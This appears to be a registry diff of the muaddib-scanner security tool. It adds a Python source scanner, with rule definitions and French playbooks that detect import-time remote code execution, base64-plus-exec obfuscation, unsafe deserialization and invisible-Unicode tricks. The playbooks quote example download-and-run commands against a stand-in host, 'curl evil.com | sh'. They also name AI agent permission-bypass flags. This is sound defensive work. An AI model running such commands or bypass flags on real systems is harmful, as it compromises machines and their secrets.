muaddib-scanner 2.11.40 → 2.11.42
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/package.json
CHANGED
package/src/pipeline/executor.js
CHANGED
|
@@ -20,6 +20,7 @@ const { deobfuscate } = require('../scanner/deobfuscate.js');
|
|
|
20
20
|
const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
|
|
21
21
|
const { loadCachedIOCs, checkIOCStaleness } = require('../ioc/updater.js');
|
|
22
22
|
const { detectPythonProject, normalizePythonName } = require('../scanner/python.js');
|
|
23
|
+
const { scanPythonSource } = require('../scanner/python-source.js');
|
|
23
24
|
const { Spinner, listInstalledPackages, wasFilesCapped, getOverflowFiles, debugLog } = require('../utils.js');
|
|
24
25
|
const { getMaxFileSize } = require('../shared/constants.js');
|
|
25
26
|
const { scanParanoid } = require('../scanner/paranoid.js');
|
|
@@ -202,7 +203,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
202
203
|
'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
|
|
203
204
|
'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
|
|
204
205
|
'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
|
|
205
|
-
'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
|
|
206
|
+
'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff', 'scanPythonSource'
|
|
206
207
|
];
|
|
207
208
|
|
|
208
209
|
const settledResults = await Promise.allSettled([
|
|
@@ -228,7 +229,12 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
228
229
|
// Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
|
|
229
230
|
// internal timeouts, but a registry slowdown with many added deps could exceed
|
|
230
231
|
// the static-scan budget without this cap.
|
|
231
|
-
withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
|
|
232
|
+
withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff'),
|
|
233
|
+
// PYSRC-001..008 (v2.11.25, TrapDoor PyPI gap). Detect import-time RCE
|
|
234
|
+
// in __init__.py / setup.py / top-level .py files. Runs always — not gated
|
|
235
|
+
// on detectPythonProject() because an attacker can ship a malicious __init__.py
|
|
236
|
+
// without a requirements.txt. Walker is cheap (just a depth-1 readdir).
|
|
237
|
+
yieldThen(() => scanPythonSource(targetPath))
|
|
232
238
|
]);
|
|
233
239
|
|
|
234
240
|
// Extract results: use empty array for rejected scanners, log errors
|
|
@@ -258,7 +264,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
258
264
|
antiForensicThreats,
|
|
259
265
|
stubPackageThreats,
|
|
260
266
|
monorepoThreats,
|
|
261
|
-
trustedDepDiffThreats
|
|
267
|
+
trustedDepDiffThreats,
|
|
268
|
+
pythonSourceThreats
|
|
262
269
|
] = scanResult;
|
|
263
270
|
|
|
264
271
|
// Emit warning if file count cap was hit + quick-scan overflow files
|
|
@@ -339,6 +346,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
|
|
|
339
346
|
...stubPackageThreats,
|
|
340
347
|
...monorepoThreats,
|
|
341
348
|
...trustedDepDiffThreats,
|
|
349
|
+
...pythonSourceThreats,
|
|
342
350
|
...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
|
|
343
351
|
type: f.type,
|
|
344
352
|
severity: f.severity,
|
|
@@ -409,6 +409,59 @@ const PLAYBOOKS = {
|
|
|
409
409
|
'pour inspecter le contenu reel. Supprimer le fichier ou nettoyer les caracteres invisibles ' +
|
|
410
410
|
'avant toute utilisation. Si deja ouvert avec un agent IA, regenerer tous les secrets touches.',
|
|
411
411
|
|
|
412
|
+
import_time_exec:
|
|
413
|
+
'CRITIQUE: Le fichier Python (__init__.py / setup.py / module top-level) execute exec() ou eval() ' +
|
|
414
|
+
'a l\'import ou pip install. RCE immediat sur la machine de l\'utilisateur. ' +
|
|
415
|
+
'NE PAS installer ce package. Si deja installe: pip uninstall immediatement, ' +
|
|
416
|
+
'auditer les processus en cours, regenerer les credentials potentiellement compromis. ' +
|
|
417
|
+
'Inspecter le code exec/eval pour identifier le payload reel.',
|
|
418
|
+
|
|
419
|
+
import_time_subprocess:
|
|
420
|
+
'CRITIQUE: Le fichier Python spawn un processus externe (subprocess.Popen/run/call/check_output) ' +
|
|
421
|
+
'a l\'import ou pip install. Generalement utilise pour fetch + execute remote payload, ' +
|
|
422
|
+
'lateral movement, ou installation de persistence. NE PAS installer. Verifier le contenu ' +
|
|
423
|
+
'de l\'appel pour identifier la commande executee. Auditer les processus enfants si deja installe.',
|
|
424
|
+
|
|
425
|
+
import_time_os_system:
|
|
426
|
+
'CRITIQUE: Le fichier Python execute des commandes shell (os.system / os.popen / os.spawn / os.exec) ' +
|
|
427
|
+
'a l\'import ou pip install. Pattern frequent: "curl evil.com | sh" ou "wget evil.com | bash". ' +
|
|
428
|
+
'NE PAS installer. Inspecter la commande exacte. Si execute: considerer la machine compromise.',
|
|
429
|
+
|
|
430
|
+
import_time_fetch_exec:
|
|
431
|
+
'CRITIQUE: Pattern TrapDoor detecte. Le fichier Python fetch un payload depuis le reseau ' +
|
|
432
|
+
'(urllib/requests/http.client/httpx/aiohttp) ET execute du code (exec/eval) dans le meme fichier. ' +
|
|
433
|
+
'C\'est la signature directe d\'une remote-payload-then-RCE. NE PAS installer. ' +
|
|
434
|
+
'Bloquer le domaine du fetch dans le firewall. Si execute: incident response complet, ' +
|
|
435
|
+
'regenerer TOUS les secrets sur la machine (SSH, AWS, GitHub, npm, env vars).',
|
|
436
|
+
|
|
437
|
+
import_time_base64_exec:
|
|
438
|
+
'CRITIQUE: Le fichier Python base64-decode du contenu ET execute (exec/eval) dans le meme fichier. ' +
|
|
439
|
+
'Pattern d\'obfuscation classique: payload encode pour echapper a la revue + grep statique. ' +
|
|
440
|
+
'NE PAS installer. Decoder le base64 manuellement pour identifier le payload reel ' +
|
|
441
|
+
'(python3 -c "import base64; print(base64.b64decode(b\'<payload>\').decode())").',
|
|
442
|
+
|
|
443
|
+
import_time_deserialization:
|
|
444
|
+
'CRITIQUE: Le fichier Python utilise pickle/marshal/dill/cloudpickle .loads() au niveau module. ' +
|
|
445
|
+
'Ces fonctions sont triviallement RCE si l\'input deserializise vient d\'une source attaquant-controllee ' +
|
|
446
|
+
'(fichier sur disque, requete HTTP, env var). NE PAS installer si l\'origine du blob deserialize ' +
|
|
447
|
+
'n\'est pas un fichier de donnees interne au package. Si interne: verifier l\'integrite (signature, hash).',
|
|
448
|
+
|
|
449
|
+
dynamic_dangerous_import:
|
|
450
|
+
'HIGH: Le fichier Python utilise __import__() avec un nom hardcode dangereux ' +
|
|
451
|
+
'(subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). ' +
|
|
452
|
+
'Pattern d\'obfuscation: evite "import X" statique pour bypass les scanners qui ne tracent ' +
|
|
453
|
+
'que les imports declares. Combinaison avec exec/subprocess/fetch indique malveillance. ' +
|
|
454
|
+
'Inspecter manuellement les appels suivants au module dynamiquement importe.',
|
|
455
|
+
|
|
456
|
+
python_source_unicode_obfuscation:
|
|
457
|
+
'CRITIQUE: Fichier Python contient ≥5 caracteres Unicode invisibles ' +
|
|
458
|
+
'(zero-width, directional override, variation selectors, tag characters). ' +
|
|
459
|
+
'Python rejette les identifiers avec ZW (PEP 3131 SyntaxError), donc le vecteur est ' +
|
|
460
|
+
'soit (a) obfuscation dans des strings (GlassWorm-style payload encoding via variation selectors), ' +
|
|
461
|
+
'soit (b) comments avec ZW pour induire en erreur la revue humaine. ' +
|
|
462
|
+
'NE PAS installer. Ouvrir le fichier dans un editeur affichant les caracteres invisibles ' +
|
|
463
|
+
'(VS Code: "editor.renderControlCharacters") pour inspecter le contenu reel.',
|
|
464
|
+
|
|
412
465
|
ai_agent_abuse:
|
|
413
466
|
'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
|
|
414
467
|
'(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +
|
package/src/rules/index.js
CHANGED
|
@@ -224,6 +224,121 @@ const RULES = {
|
|
|
224
224
|
],
|
|
225
225
|
mitre: 'T1195.002'
|
|
226
226
|
},
|
|
227
|
+
|
|
228
|
+
// PYSRC-001 a 008 — Python source scanner (TrapDoor PyPI gap, v2.11.25).
|
|
229
|
+
// python.js est manifest-only ; ast.js/dataflow.js sont JS-only ; ioc-strings.js
|
|
230
|
+
// fait du literal match. Aucun ne couvre l'execution a l'import via __init__.py
|
|
231
|
+
// / setup.py. Ces 8 regles ferment ce gap.
|
|
232
|
+
import_time_exec: {
|
|
233
|
+
id: 'MUADDIB-PYSRC-001',
|
|
234
|
+
name: 'Python Import-Time exec/eval',
|
|
235
|
+
severity: 'CRITICAL',
|
|
236
|
+
confidence: 'high',
|
|
237
|
+
domain: 'malware',
|
|
238
|
+
description: 'Fichier Python (__init__.py, setup.py, top-level *.py) contient exec()/eval() — execution directe de code a l\'import ou a pip install. RCE immediat sur la machine de l\'utilisateur. Pattern central de TrapDoor (mai 2026).',
|
|
239
|
+
references: [
|
|
240
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
241
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
242
|
+
],
|
|
243
|
+
mitre: 'T1059.006'
|
|
244
|
+
},
|
|
245
|
+
import_time_subprocess: {
|
|
246
|
+
id: 'MUADDIB-PYSRC-002',
|
|
247
|
+
name: 'Python Import-Time subprocess',
|
|
248
|
+
severity: 'CRITICAL',
|
|
249
|
+
confidence: 'high',
|
|
250
|
+
domain: 'malware',
|
|
251
|
+
description: 'Fichier Python contient subprocess.Popen/run/call/check_output au niveau module — spawn d\'un processus externe a l\'import ou pip install. Utilise pour fetch + execute remote payload ou pour latteral movement.',
|
|
252
|
+
references: [
|
|
253
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
254
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
255
|
+
],
|
|
256
|
+
mitre: 'T1059.006'
|
|
257
|
+
},
|
|
258
|
+
import_time_os_system: {
|
|
259
|
+
id: 'MUADDIB-PYSRC-003',
|
|
260
|
+
name: 'Python Import-Time os.system / os.popen / os.spawn / os.exec',
|
|
261
|
+
severity: 'CRITICAL',
|
|
262
|
+
confidence: 'high',
|
|
263
|
+
domain: 'malware',
|
|
264
|
+
description: 'Fichier Python contient os.system(), os.popen(), os.spawn*() ou os.exec*() au niveau module — shell execution a l\'import ou pip install. Generalement utilise pour curl|sh ou wget|bash remote payload.',
|
|
265
|
+
references: [
|
|
266
|
+
'https://attack.mitre.org/techniques/T1059/006/',
|
|
267
|
+
'https://attack.mitre.org/techniques/T1059/004/'
|
|
268
|
+
],
|
|
269
|
+
mitre: 'T1059.006'
|
|
270
|
+
},
|
|
271
|
+
import_time_fetch_exec: {
|
|
272
|
+
id: 'MUADDIB-PYSRC-004',
|
|
273
|
+
name: 'Python Import-Time Fetch + Exec (TrapDoor pattern)',
|
|
274
|
+
severity: 'CRITICAL',
|
|
275
|
+
confidence: 'high',
|
|
276
|
+
domain: 'malware',
|
|
277
|
+
description: 'Compound detection : le meme fichier Python contient (urllib.request / requests / http.client / httpx / aiohttp) ET exec()/eval(). Signature directe de TrapDoor : telecharge un payload depuis le C2 et l\'execute. Implique RCE + capacite C2 active.',
|
|
278
|
+
references: [
|
|
279
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
280
|
+
'https://attack.mitre.org/techniques/T1105/',
|
|
281
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
282
|
+
],
|
|
283
|
+
mitre: 'T1105'
|
|
284
|
+
},
|
|
285
|
+
import_time_base64_exec: {
|
|
286
|
+
id: 'MUADDIB-PYSRC-005',
|
|
287
|
+
name: 'Python Import-Time Base64 Decode + Exec',
|
|
288
|
+
severity: 'CRITICAL',
|
|
289
|
+
confidence: 'high',
|
|
290
|
+
domain: 'malware',
|
|
291
|
+
description: 'Compound detection : le meme fichier Python contient base64.b64decode / codecs.decode ET exec()/eval(). Pattern d\'obfuscation classique : payload encode en base64 (parfois chaine multiple) puis execute. Vu dans Lazarus PyPI campaigns + TrapDoor.',
|
|
292
|
+
references: [
|
|
293
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
294
|
+
'https://attack.mitre.org/techniques/T1027/',
|
|
295
|
+
'https://attack.mitre.org/techniques/T1059/006/'
|
|
296
|
+
],
|
|
297
|
+
mitre: 'T1027'
|
|
298
|
+
},
|
|
299
|
+
import_time_deserialization: {
|
|
300
|
+
id: 'MUADDIB-PYSRC-006',
|
|
301
|
+
name: 'Python Import-Time Unsafe Deserialization',
|
|
302
|
+
severity: 'CRITICAL',
|
|
303
|
+
confidence: 'high',
|
|
304
|
+
domain: 'vulnerability',
|
|
305
|
+
description: 'Fichier Python utilise pickle/cPickle/marshal/dill/cloudpickle/jsonpickle/shelve .loads() au niveau module. Ces fonctions sont trivialement RCE si l\'input est attaquant-controle (deserialization = code execution). Risque critique meme sans malveillance prouvee.',
|
|
306
|
+
references: [
|
|
307
|
+
'https://docs.python.org/3/library/pickle.html#restricting-globals',
|
|
308
|
+
'https://attack.mitre.org/techniques/T1059/006/',
|
|
309
|
+
'https://cwe.mitre.org/data/definitions/502.html'
|
|
310
|
+
],
|
|
311
|
+
mitre: 'T1059.006'
|
|
312
|
+
},
|
|
313
|
+
dynamic_dangerous_import: {
|
|
314
|
+
id: 'MUADDIB-PYSRC-007',
|
|
315
|
+
name: 'Python Dynamic __import__ of Dangerous Module',
|
|
316
|
+
severity: 'HIGH',
|
|
317
|
+
confidence: 'medium',
|
|
318
|
+
domain: 'malware',
|
|
319
|
+
description: 'Fichier Python utilise __import__() avec un nom hardcode dangereux (subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). Pattern d\'obfuscation : evite l\'instruction "import X" statique pour echapper aux scanners qui ne tracent que les imports declares.',
|
|
320
|
+
references: [
|
|
321
|
+
'https://attack.mitre.org/techniques/T1027/',
|
|
322
|
+
'https://docs.python.org/3/library/functions.html#import__'
|
|
323
|
+
],
|
|
324
|
+
mitre: 'T1027'
|
|
325
|
+
},
|
|
326
|
+
python_source_unicode_obfuscation: {
|
|
327
|
+
id: 'MUADDIB-PYSRC-008',
|
|
328
|
+
name: 'Python Source Unicode Obfuscation',
|
|
329
|
+
severity: 'CRITICAL',
|
|
330
|
+
confidence: 'high',
|
|
331
|
+
domain: 'malware',
|
|
332
|
+
description: 'Fichier Python contient ≥5 caracteres Unicode invisibles (zero-width, directional override, variation selectors, tag characters). Mirror de AICONF-004 pour les sources .py. Python rejette les identifiers avec ZW chars (SyntaxError, PEP 3131), donc le vecteur principal c\'est l\'obfuscation dans les strings (GlassWorm-style payload encoding) ou dans les comments (mislead human review).',
|
|
333
|
+
references: [
|
|
334
|
+
'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
|
|
335
|
+
'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
|
|
336
|
+
'https://trojansource.codes/',
|
|
337
|
+
'https://attack.mitre.org/techniques/T1027/'
|
|
338
|
+
],
|
|
339
|
+
mitre: 'T1027.013'
|
|
340
|
+
},
|
|
341
|
+
|
|
227
342
|
suspicious_file: {
|
|
228
343
|
id: 'MUADDIB-DEP-002',
|
|
229
344
|
name: 'Suspicious File in Dependency',
|
|
@@ -0,0 +1,319 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
|
|
3
|
+
/**
|
|
4
|
+
* Python Source Scanner — detects import-time / install-time RCE patterns.
|
|
5
|
+
*
|
|
6
|
+
* Created v2.11.25 (TrapDoor PyPI gap, mai 2026). `python.js` is a manifest
|
|
7
|
+
* parser (requirements.txt, setup.py, pyproject.toml — extracts dep names) ;
|
|
8
|
+
* it never reads package source. `ast.js` / `dataflow.js` use acorn (JS only)
|
|
9
|
+
* and skip `.py`. Only `ioc-strings.js` opens `.py` files, just for literal
|
|
10
|
+
* IOC matching. → A malicious `__init__.py` that fetches + execs a payload at
|
|
11
|
+
* import time was invisible to MUAD'DIB. This scanner closes that gap.
|
|
12
|
+
*
|
|
13
|
+
* Pas d'AST Python (CLAUDE.md interdit les deps runtime hors acorn / js-yaml /
|
|
14
|
+
* adm-zip / @inquirer/prompts). Détection par regex ciblées sur les API
|
|
15
|
+
* dangereuses, avec préprocessing :
|
|
16
|
+
* - strip des full-line comments (`^\s*#.*$`)
|
|
17
|
+
* - strip des triple-quoted strings (docstrings, block strings — réduit les
|
|
18
|
+
* FPs sur les docs qui mentionnent `exec`)
|
|
19
|
+
* - strip des chars Unicode invisibles via le helper partagé (mirror du fix
|
|
20
|
+
* AICONF-004 : empêche `e<ZWSP>xec(` de bypass — bien que Python rejette
|
|
21
|
+
* cet identifier comme SyntaxError, des invisibles dans des strings/comments
|
|
22
|
+
* restent un signal d'obfuscation valide).
|
|
23
|
+
*
|
|
24
|
+
* Rules : PYSRC-001 à PYSRC-008. Voir src/rules/index.js pour le détail.
|
|
25
|
+
*
|
|
26
|
+
* Références :
|
|
27
|
+
* - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
|
|
28
|
+
* - https://attack.mitre.org/techniques/T1059/006/ (Command Scripting Interpreter: Python)
|
|
29
|
+
*/
|
|
30
|
+
|
|
31
|
+
const fs = require('fs');
|
|
32
|
+
const path = require('path');
|
|
33
|
+
const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
|
|
34
|
+
|
|
35
|
+
const MAX_FILE_SIZE = 1024 * 1024; // 1 MB cap, cohérent avec ai-config.js
|
|
36
|
+
|
|
37
|
+
const PYSRC_UNICODE_THRESHOLD = 5;
|
|
38
|
+
|
|
39
|
+
// Dirs to skip when looking for __init__.py at depth-1. Couvre les patterns
|
|
40
|
+
// classiques (virtualenv, caches, tests, docs, build artifacts).
|
|
41
|
+
const EXCLUDED_DIRS = new Set([
|
|
42
|
+
'tests', 'test', '__pycache__', '.pytest_cache', '.tox', '.nox',
|
|
43
|
+
'.venv', 'venv', 'env', '.env',
|
|
44
|
+
'.git', '.hg', '.svn',
|
|
45
|
+
'node_modules',
|
|
46
|
+
'examples', 'example', 'sample', 'samples',
|
|
47
|
+
'docs', 'doc',
|
|
48
|
+
'build', 'dist', 'site-packages',
|
|
49
|
+
'.mypy_cache', '.ruff_cache', '.pytype', '.pyre',
|
|
50
|
+
'.muaddib-cache', '.idea', '.vscode'
|
|
51
|
+
]);
|
|
52
|
+
|
|
53
|
+
// Files explicitly targeted at root (always scanned if present).
|
|
54
|
+
const ROOT_TARGET_FILES = ['__init__.py', 'setup.py'];
|
|
55
|
+
|
|
56
|
+
/**
|
|
57
|
+
* Locate Python files that execute at import or install time.
|
|
58
|
+
*
|
|
59
|
+
* @param {string} targetPath
|
|
60
|
+
* @returns {string[]} Absolute file paths, deduplicated.
|
|
61
|
+
*/
|
|
62
|
+
function findTargetPythonFiles(targetPath) {
|
|
63
|
+
const targets = new Set();
|
|
64
|
+
|
|
65
|
+
let rootEntries;
|
|
66
|
+
try {
|
|
67
|
+
rootEntries = fs.readdirSync(targetPath);
|
|
68
|
+
} catch {
|
|
69
|
+
return [];
|
|
70
|
+
}
|
|
71
|
+
|
|
72
|
+
// 1. ROOT_TARGET_FILES + every *.py at root (single-module packages)
|
|
73
|
+
for (const entry of rootEntries) {
|
|
74
|
+
if (!entry.endsWith('.py') && !ROOT_TARGET_FILES.includes(entry)) continue;
|
|
75
|
+
const full = path.join(targetPath, entry);
|
|
76
|
+
try {
|
|
77
|
+
if (fs.statSync(full).isFile()) targets.add(full);
|
|
78
|
+
} catch { /* ignore */ }
|
|
79
|
+
}
|
|
80
|
+
|
|
81
|
+
// 2. <subdir>/__init__.py at depth 1 (covers <pkg>/__init__.py layout)
|
|
82
|
+
for (const entry of rootEntries) {
|
|
83
|
+
if (EXCLUDED_DIRS.has(entry)) continue;
|
|
84
|
+
if (entry.startsWith('.') && entry !== '.') continue; // skip hidden dirs by default
|
|
85
|
+
const subdir = path.join(targetPath, entry);
|
|
86
|
+
try {
|
|
87
|
+
if (!fs.statSync(subdir).isDirectory()) continue;
|
|
88
|
+
} catch { continue; }
|
|
89
|
+
|
|
90
|
+
const initPy = path.join(subdir, '__init__.py');
|
|
91
|
+
try {
|
|
92
|
+
if (fs.statSync(initPy).isFile()) targets.add(initPy);
|
|
93
|
+
} catch { /* not a file */ }
|
|
94
|
+
|
|
95
|
+
// 3. src/<pkg>/__init__.py for PEP-518 src-layout
|
|
96
|
+
if (entry === 'src') {
|
|
97
|
+
let innerEntries;
|
|
98
|
+
try {
|
|
99
|
+
innerEntries = fs.readdirSync(subdir);
|
|
100
|
+
} catch { continue; }
|
|
101
|
+
for (const inner of innerEntries) {
|
|
102
|
+
if (EXCLUDED_DIRS.has(inner)) continue;
|
|
103
|
+
if (inner.startsWith('.')) continue;
|
|
104
|
+
const innerDir = path.join(subdir, inner);
|
|
105
|
+
try {
|
|
106
|
+
if (!fs.statSync(innerDir).isDirectory()) continue;
|
|
107
|
+
} catch { continue; }
|
|
108
|
+
const innerInit = path.join(innerDir, '__init__.py');
|
|
109
|
+
try {
|
|
110
|
+
if (fs.statSync(innerInit).isFile()) targets.add(innerInit);
|
|
111
|
+
} catch { /* not a file */ }
|
|
112
|
+
}
|
|
113
|
+
}
|
|
114
|
+
}
|
|
115
|
+
|
|
116
|
+
return [...targets];
|
|
117
|
+
}
|
|
118
|
+
|
|
119
|
+
/**
|
|
120
|
+
* Strip full-line Python comments (lines whose first non-whitespace char is `#`).
|
|
121
|
+
* Inline trailing comments are kept to avoid the complexity of a tokenizer.
|
|
122
|
+
*
|
|
123
|
+
* @param {string} content
|
|
124
|
+
* @returns {string}
|
|
125
|
+
*/
|
|
126
|
+
function stripPythonComments(content) {
|
|
127
|
+
return content.split(/\r?\n/).map(line => {
|
|
128
|
+
const trimmed = line.trimStart();
|
|
129
|
+
if (trimmed.startsWith('#')) return '';
|
|
130
|
+
return line;
|
|
131
|
+
}).join('\n');
|
|
132
|
+
}
|
|
133
|
+
|
|
134
|
+
/**
|
|
135
|
+
* Strip triple-quoted strings (`"""..."""` and `'''...'''`). These are
|
|
136
|
+
* typically docstrings or block-string literals containing free-form text
|
|
137
|
+
* that may mention keywords like `exec` or `subprocess` without being a real
|
|
138
|
+
* call site. Single-quoted strings are preserved (an attacker often hides
|
|
139
|
+
* the payload inside `exec("import os; ...")`).
|
|
140
|
+
*
|
|
141
|
+
* @param {string} content
|
|
142
|
+
* @returns {string}
|
|
143
|
+
*/
|
|
144
|
+
function stripTripleQuotedStrings(content) {
|
|
145
|
+
return content
|
|
146
|
+
.replace(/"""[\s\S]*?"""/g, '""')
|
|
147
|
+
.replace(/'''[\s\S]*?'''/g, "''");
|
|
148
|
+
}
|
|
149
|
+
|
|
150
|
+
// --- Pattern detectors. All operate on a content string that has already
|
|
151
|
+
// been Unicode-normalized + comment-stripped + docstring-stripped.
|
|
152
|
+
|
|
153
|
+
function detectImportTimeExec(content) {
|
|
154
|
+
// exec(...) or eval(...). Lookbehind excludes obj.exec(, ast.literal_eval(.
|
|
155
|
+
return /(?<![.\w])(exec|eval)\s*\(/.test(content);
|
|
156
|
+
}
|
|
157
|
+
|
|
158
|
+
function detectImportTimeSubprocess(content) {
|
|
159
|
+
return /\bsubprocess\.(Popen|run|call|check_output|check_call|getoutput|getstatusoutput)\s*\(/.test(content);
|
|
160
|
+
}
|
|
161
|
+
|
|
162
|
+
function detectImportTimeOsSystem(content) {
|
|
163
|
+
// os.system, os.popen, os.spawn*, os.execv/exec*
|
|
164
|
+
return /\bos\.(system|popen[234]?|spawn[a-z]+|exec[a-z]+)\s*\(/.test(content);
|
|
165
|
+
}
|
|
166
|
+
|
|
167
|
+
function detectNetworkFetch(content) {
|
|
168
|
+
if (/\burllib\.request\.urlopen\s*\(/.test(content)) return true;
|
|
169
|
+
if (/\burllib2\.urlopen\s*\(/.test(content)) return true;
|
|
170
|
+
if (/\brequests\.(get|post|put|delete|patch|head|options|request)\s*\(/.test(content)) return true;
|
|
171
|
+
if (/\bhttp\.client\.HTTPS?Connection\b/.test(content)) return true;
|
|
172
|
+
if (/\bhttpx\.(get|post|put|delete|patch|head|options|request|Client|AsyncClient)\b/.test(content)) return true;
|
|
173
|
+
if (/\baiohttp\.ClientSession\b/.test(content)) return true;
|
|
174
|
+
return false;
|
|
175
|
+
}
|
|
176
|
+
|
|
177
|
+
function detectBase64Decode(content) {
|
|
178
|
+
if (/\bbase64\.(b64|b32|b16|standard_b64|urlsafe_b64)decode\s*\(/.test(content)) return true;
|
|
179
|
+
if (/\bcodecs\.decode\s*\(/.test(content)) return true;
|
|
180
|
+
return false;
|
|
181
|
+
}
|
|
182
|
+
|
|
183
|
+
function detectDeserialization(content) {
|
|
184
|
+
return /\b(pickle|cPickle|marshal|dill|cloudpickle|jsonpickle|shelve)\.loads?\s*\(/.test(content);
|
|
185
|
+
}
|
|
186
|
+
|
|
187
|
+
function detectDynamicDangerousImport(content) {
|
|
188
|
+
return /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)['"]/.test(content);
|
|
189
|
+
}
|
|
190
|
+
|
|
191
|
+
/**
|
|
192
|
+
* Scan Python source files under targetPath for import-time / install-time RCE.
|
|
193
|
+
*
|
|
194
|
+
* @param {string} targetPath
|
|
195
|
+
* @returns {Array<{type: string, severity: string, message: string, file: string}>}
|
|
196
|
+
*/
|
|
197
|
+
function scanPythonSource(targetPath) {
|
|
198
|
+
const threats = [];
|
|
199
|
+
|
|
200
|
+
const files = findTargetPythonFiles(targetPath);
|
|
201
|
+
if (files.length === 0) return threats;
|
|
202
|
+
|
|
203
|
+
for (const file of files) {
|
|
204
|
+
let stat;
|
|
205
|
+
try {
|
|
206
|
+
stat = fs.statSync(file);
|
|
207
|
+
} catch { continue; }
|
|
208
|
+
if (!stat.isFile() || stat.size === 0 || stat.size > MAX_FILE_SIZE) continue;
|
|
209
|
+
|
|
210
|
+
let rawContent;
|
|
211
|
+
try {
|
|
212
|
+
rawContent = fs.readFileSync(file, 'utf8');
|
|
213
|
+
} catch { continue; }
|
|
214
|
+
|
|
215
|
+
const relPath = path.relative(targetPath, file);
|
|
216
|
+
|
|
217
|
+
// 1. PYSRC-008 — Unicode obfuscation (computed on raw content, before strip).
|
|
218
|
+
const invisibleCount = countInvisibleUnicode(rawContent);
|
|
219
|
+
if (invisibleCount >= PYSRC_UNICODE_THRESHOLD) {
|
|
220
|
+
threats.push({
|
|
221
|
+
type: 'python_source_unicode_obfuscation',
|
|
222
|
+
severity: 'CRITICAL',
|
|
223
|
+
message: `${relPath}: ${invisibleCount} invisible Unicode chars (zero-width / directional / variation selectors) — possible obfuscation hiding payload content from human review.`,
|
|
224
|
+
file: relPath
|
|
225
|
+
});
|
|
226
|
+
}
|
|
227
|
+
|
|
228
|
+
// 2. Normalize Unicode, strip docstrings + full-line comments.
|
|
229
|
+
const normalized = invisibleCount > 0 ? stripInvisibleUnicode(rawContent) : rawContent;
|
|
230
|
+
const cleaned = stripPythonComments(stripTripleQuotedStrings(normalized));
|
|
231
|
+
|
|
232
|
+
// 3. Atomic detectors.
|
|
233
|
+
const hasExec = detectImportTimeExec(cleaned);
|
|
234
|
+
const hasSubprocess = detectImportTimeSubprocess(cleaned);
|
|
235
|
+
const hasOsSystem = detectImportTimeOsSystem(cleaned);
|
|
236
|
+
const hasFetch = detectNetworkFetch(cleaned);
|
|
237
|
+
const hasBase64 = detectBase64Decode(cleaned);
|
|
238
|
+
const hasDeser = detectDeserialization(cleaned);
|
|
239
|
+
const hasDynImport = detectDynamicDangerousImport(cleaned);
|
|
240
|
+
|
|
241
|
+
if (hasExec) {
|
|
242
|
+
threats.push({
|
|
243
|
+
type: 'import_time_exec',
|
|
244
|
+
severity: 'CRITICAL',
|
|
245
|
+
message: `${relPath}: exec()/eval() at module level — direct code execution on import or pip install (RCE).`,
|
|
246
|
+
file: relPath
|
|
247
|
+
});
|
|
248
|
+
}
|
|
249
|
+
if (hasSubprocess) {
|
|
250
|
+
threats.push({
|
|
251
|
+
type: 'import_time_subprocess',
|
|
252
|
+
severity: 'CRITICAL',
|
|
253
|
+
message: `${relPath}: subprocess.Popen/run/call/check_output — spawns external process on import or install.`,
|
|
254
|
+
file: relPath
|
|
255
|
+
});
|
|
256
|
+
}
|
|
257
|
+
if (hasOsSystem) {
|
|
258
|
+
threats.push({
|
|
259
|
+
type: 'import_time_os_system',
|
|
260
|
+
severity: 'CRITICAL',
|
|
261
|
+
message: `${relPath}: os.system()/os.popen()/os.spawn*()/os.exec*() — shell execution on import or install.`,
|
|
262
|
+
file: relPath
|
|
263
|
+
});
|
|
264
|
+
}
|
|
265
|
+
if (hasDeser) {
|
|
266
|
+
threats.push({
|
|
267
|
+
type: 'import_time_deserialization',
|
|
268
|
+
severity: 'CRITICAL',
|
|
269
|
+
message: `${relPath}: pickle/marshal/dill/cloudpickle/jsonpickle .loads() — unsafe deserialization, trivially RCE if input is attacker-controlled.`,
|
|
270
|
+
file: relPath
|
|
271
|
+
});
|
|
272
|
+
}
|
|
273
|
+
if (hasDynImport) {
|
|
274
|
+
threats.push({
|
|
275
|
+
type: 'dynamic_dangerous_import',
|
|
276
|
+
severity: 'HIGH',
|
|
277
|
+
